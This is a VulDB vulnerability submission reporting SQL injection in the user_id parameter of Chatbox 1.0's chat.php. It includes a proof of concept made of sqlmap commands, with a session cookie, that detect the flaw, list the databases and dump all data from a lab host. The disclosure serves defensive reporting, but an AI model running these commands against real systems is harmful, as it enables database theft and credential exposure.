Soumettre #636884: shafhasan Chatbox 1.0 1.0 SQL Injectioninformation

Titreshafhasan Chatbox 1.0 1.0 SQL Injection
DescriptionTitle of the Vulnerability: Chatbox 1.0 | chat.php?user_id= SQL Injection | Found By Maloy Roy Orko Vulnerability Class: SQL Injection Product Name: Chatbox 1.0 CWE:89 Vendor: https://github.com/shafhasan/ Vulnerable Product Link: https://github.com/shafhasan/chatbox Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too. Product & Service Introduction: Chatbox 1.0 using JavaScript and PHP Exploitation POC via SQLmap: (1) Vulnerability Search: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 (2) Database Dumping: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dbs (3) Dumping All Data: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dump Full Detailed POC: https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html
La source⚠️ https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html
Utilisateur
 MaloyRoyOrko (UID 79572)
Soumission18/08/2025 18:51 (il y a 8 mois)
Modérer29/08/2025 08:48 (11 days later)
StatutAccepté
Entrée VulDB321859 [shafhasan chatbox /chat.php user_id injection SQL]
Points20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!